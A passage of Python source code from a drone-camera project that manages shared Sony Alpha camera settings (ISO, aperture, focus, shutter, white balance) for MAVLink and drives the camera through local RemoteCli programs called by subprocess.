return self.set_sony_iso,self.prev_sony_iso,True
else:
return self.set_sony_iso,self.prev_sony_iso,False
def setVal_sony_aperture(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_aperture = self.set_sony_aperture
self.set_sony_aperture = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_aperture(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_aperture,self.prev_sony_aperture))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_aperture,self.prev_sony_aperture,True
else:
return self.set_sony_aperture,self.prev_sony_aperture,False
def setVal_sony_ex_pro(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_ex_pro = self.set_sony_ex_pro
self.set_sony_ex_pro = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_ex_pro(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_ex_pro,self.prev_sony_ex_pro))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_ex_pro,self.prev_sony_ex_pro,True
else:
return self.set_sony_ex_pro,self.prev_sony_ex_pro,False
def setVal_sony_focus_area(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_focus_area = self.set_sony_focus_area
self.set_sony_focus_area = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_focus_area(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_focus_area,self.prev_sony_focus_area))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_focus_area,self.prev_sony_focus_area,True
else:
return self.set_sony_focus_area,self.prev_sony_focus_area,False
def setVal_sony_focus(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_focus = self.set_sony_focus
self.set_sony_focus = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_focus(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_focus,self.prev_sony_focus))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_focus,self.prev_sony_focus,True
else:
return self.set_sony_focus,self.prev_sony_focus,False
def setVal_sony_shutter(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_shutter = self.set_sony_shutter
self.set_sony_shutter = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_shutter(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_shutter,self.prev_sony_shutter))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_shutter,self.prev_sony_shutter,True
else:
return self.set_sony_shutter,self.prev_sony_shutter,False
def setVal_sony_white_bal(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_white_bal = self.set_sony_white_bal
self.set_sony_white_bal = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_white_bal(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_white_bal,self.prev_sony_white_bal))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_white_bal,self.prev_sony_white_bal,True
else:
return self.set_sony_white_bal,self.prev_sony_white_bal,False
def setVal_sony_still_cap_mode(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_still_cap_mode = self.set_sony_still_cap_mode
self.set_sony_still_cap_mode = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_still_cap_mode(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode,True
else:
return self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode,False
def setMavIsoModeData( self, dataRcv ):
ret = False
ret = self.setVal_sony_iso(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavApertureData( self, dataRcv ):
ret = False
ret = self.setVal_sony_aperture(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavExProData( self, dataRcv ):
ret = False
ret = self.setVal_sony_ex_pro(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavFocusAreaData( self, dataRcv ):
ret = False
ret = self.setVal_sony_focus_area(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavFocusData( self, dataRcv ):
ret = False
ret = self.setVal_sony_focus(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavShutterData( self, dataRcv ):
ret = False
ret = self.setVal_sony_shutter(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavWhiteBalData( self, dataRcv ):
ret = False
ret = self.setVal_sony_white_bal(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavStillCapModeData( self, dataRcv ):
ret = False
ret = self.setVal_sony_still_cap_mode(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
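# ===============================================================================================================================
# Usage sketch (hypothetical, not part of the original module): a MAVLink PARAM_SET handler could
# route incoming parameter writes into the shared write-values object through the setMav*Data
# helpers above. The param-id strings used as dictionary keys here are assumptions for
# illustration only.
# ===============================================================================================================================
def example_route_param_set(camVals, param_id, value):
    # camVals is a mavlinkSonyCamWriteVals instance shared with the camera task
    handlers = {
        'S_STILL_CAP': camVals.setMavStillCapModeData,
        'S_WHITE_BAL': camVals.setMavWhiteBalData,
        'S_SHUT_SPD': camVals.setMavShutterData,
        'S_ISO': camVals.setMavIsoModeData,
        'S_FOCUS_MODE': camVals.setMavFocusData,
        'S_FOCUS_AREA': camVals.setMavFocusAreaData,
        'S_APERTURE': camVals.setMavApertureData,
        'S_EX_PRO': camVals.setMavExProData,
    }
    handler = handlers.get(param_id)
    if handler is None:
        return False
    return handler(int(value))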
# ===============================================================================================================================
#
# Name : MemoryValueClass.py
# Desc : Global memory value class for use with cameras and mavlink
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
import time
class memoryValue():
STATE_READY = 1
STATE_CAM_WRITING = 2
STATE_MAV_READING = 3
STATE_MAV_WRITING = 4
STATE_CAM_READING = 5
numberOfVals = 0
def __init__ (self, name = 'value_name_not_set', signal = None, prev = None, state = STATE_READY):
self.signal = signal # signal value
self.prev = prev # previous signal value
self.state = state # state of the value
self.nextpointer = None # pointer for chain if needed
self.name = name # name as a string
self.timestamp = 0 # timestamp
self.updateNeeded = False # update required
memoryValue.numberOfVals += 1 # global counter of the number of values
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def get_value_counter(self):
print('%s: %d' % (self.name,memoryValue.numberOfVals))
return memoryValue.numberOfVals
def get_value_data(self,YourID,timeout):
timeCnt = 0
while (not (self.state == memoryValue.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('Description: {}. value: {} previous: {}'.format(self.name, self.signal,self.prev))
self.state = memoryValue.STATE_READY
return self.name,self.signal,self.prev,True
else:
return self.name,self.signal,self.prev,False
def set_value(self,value,myId,timeout):
timeCnt = 0
while (not (self.state == memoryValue.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
self.prev = self.signal
self.signal = value
self.updateNeeded = True
self.state = memoryValue.STATE_READY
return True
else:
return False
def get_value_data_if_avail(self,YourID):
if (self.state == memoryValue.STATE_READY):
self.state = YourID
print('Description: {}. value: {}'.format(self.name, self.signal))
self.state = memoryValue.STATE_READY
return self.name,self.signal,self.prev,True
else:
return self.name,self.signal,self.prev,False
def set_update_flag( self, stateSent, myId ):
if (self.state == memoryValue.STATE_READY):
self.state = myId
self.updateNeeded = stateSent
self.state = memoryValue.STATE_READY
return True
else:
return False
if __name__ == '__main__':
initVal = 23
getName = "noName"
getValueforMAVSending = 0
getPrev = 0
SonyWhiteBalance = memoryValue('sonyWhiteBal',initVal)
FocusSetpoint = memoryValue('FocusSetpoint',initVal+6)
#
# example using in mavlink sender
#
mavSetPointVal = 99 #we_got_from_mavlink
Timeout = 20
if (FocusSetpoint.set_value(mavSetPointVal, memoryValue.STATE_MAV_WRITING, Timeout) == True):
# { value has been successfully set }
print("set the setpoint value focus")
#
# example to get the white balance setting from the cam to send over mavlink
#
getName, getValueforMAVSending, getPrev, myState = SonyWhiteBalance.get_value_data(memoryValue.STATE_MAV_READING, Timeout)
if (myState == True):
        # now pack the data
print("got data ok")
else:
# you got an error or timeout
print("data error")
#
# example using in mavlink sender
#
mavSetPointVal = 199 #we_got_from_mavlink
Timeout = 20
if (SonyWhiteBalance.set_value(mavSetPointVal, memoryValue.STATE_MAV_WRITING, Timeout) == True):
# { value has been successfully set }
print("set the setpoint value white balance")
#
# example to get the white balance setting from the cam to send over mavlink
#
getName, getValueforMAVSending, getPrev, myState = SonyWhiteBalance.get_value_data(memoryValue.STATE_MAV_READING, Timeout)
if (myState == True):
        # now pack the data
print("got data ok")
else:
# you got an error or timeout
print("data error")
#
# example to iterate without waiting for completion on the write to the value from elsewhere
#
myState = False
while not myState == True:
getName, getVal, getPrev, myState = FocusSetpoint.get_value_data_if_avail( memoryValue.STATE_CAM_READING )
if myState == True:
# now use this value and send to the camera
print("setpoint available")
else:
            # do something else while waiting
print("setpoint being written by other task")
# what you do until it has arrived
time.sleep(0.1)
# what you do after
print("using the setpoint to change the camera")
#
# print the number of memory values
#
print(FocusSetpoint.get_value_counter())
print(SonyWhiteBalance.get_value_counter())
#
# Release the shared memory
#
del FocusSetpoint
del SonyWhiteBalance
# ===============================================================================================================================
#
# Name : NewSonyAlphaClass.py
# Desc : Communicate with new Sony Alpha Series of Camera
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
import shlex, subprocess, pprint
import sys, os                      # used by check_my_os() and my_timestamp() below
class sonyAlphaNewCamera():
def __init__ (self, name = 'sonyAlphaCamClass'):
self.name = name # name as a string
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def check_my_os( self ):
if ((sys.platform=='linux2') or (sys.platform=='linux')): return 1
elif sys.platform=='win32': return 2
else: return 3
def my_timestamp( self ):
if (self.check_my_os() == 1):
cmd = "date +%s"
return( int(os.popen(cmd).read()) )
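    # -------------------------------------------------------------------------------------------
    # Sketch (hypothetical alternative, not called anywhere): the standard library returns the
    # same epoch timestamp without shelling out to `date`, and works on every platform, which
    # would remove the need for the OS check in my_timestamp().
    # -------------------------------------------------------------------------------------------
    def my_timestamp_portable( self ):
        import time                 # local import; this module does not import time at the top
        return int(time.time())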
def set_sony_iso( self, isoVal ):
# run the API command in the shell and look for the descriptor for the field
#
isoValArg=str(isoVal)
cmd='/home/pi/cams/SonyTEST32/set_iso/RemoteCli ' + isoValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "ISO_Mode"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('ISO_Format') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
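    # -------------------------------------------------------------------------------------------
    # Sketch (hypothetical, not called by the methods below): every set_/get_ method in this
    # class repeats the same RemoteCli call-and-parse boilerplate. A helper like this keeps the
    # field parser in one place; cmd is the full RemoteCli command line and key is the label to
    # search for (e.g. 'ISO_Format').
    # -------------------------------------------------------------------------------------------
    def _run_remotecli_and_parse( self, cmd, key ):
        args = shlex.split(cmd)
        s = subprocess.Popen(args, stdout=subprocess.PIPE)
        p2 = subprocess.Popen(["grep", key], stdin=s.stdout, stdout=subprocess.PIPE)
        output = p2.communicate()[0]
        s.stdout.close()
        a = shlex.split(output.decode('ascii'))       # split the grepped output into fields
        answers = []
        idx = 99999
        for itemNo, xx in enumerate(a):
            if xx.find(key) > -1:
                idx = itemNo                          # remember where the label was seen
            elif idx != 99999:
                if xx.find(':') > -1:
                    idx = itemNo
                elif not xx.isdigit():
                    if xx.find("AUTO") > -1:
                        xx = "0"                      # AUTO reads back as 0 (kept as a string)
                    answers.append(xx.replace(",", "").strip("}"))
                    idx = 99999
        return answers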
def set_sony_aperture( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_aperture/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Aperture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Aperture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_ex_pro( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_ex_pro/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Exposure_Program_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Exposure_Program_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_focus( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_focus/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_focus_area( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_fa/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Area_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Area_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_shutter( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_shutter/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Shutter_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Shutter_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_white_bal( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_wb/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "White_Bal_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('White_Bal_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_still_cap_mode( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/still_cap_mode/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Still_Capture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Still_Capture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_white_balance( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/white_bal/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "White_Bal_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('White_Bal_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_ex_pro( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/exp_pro_mode/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Exposure_Program_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Exposure_Program_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_aperture( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_aperture/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Aperture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Aperture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_focus( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_focus/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
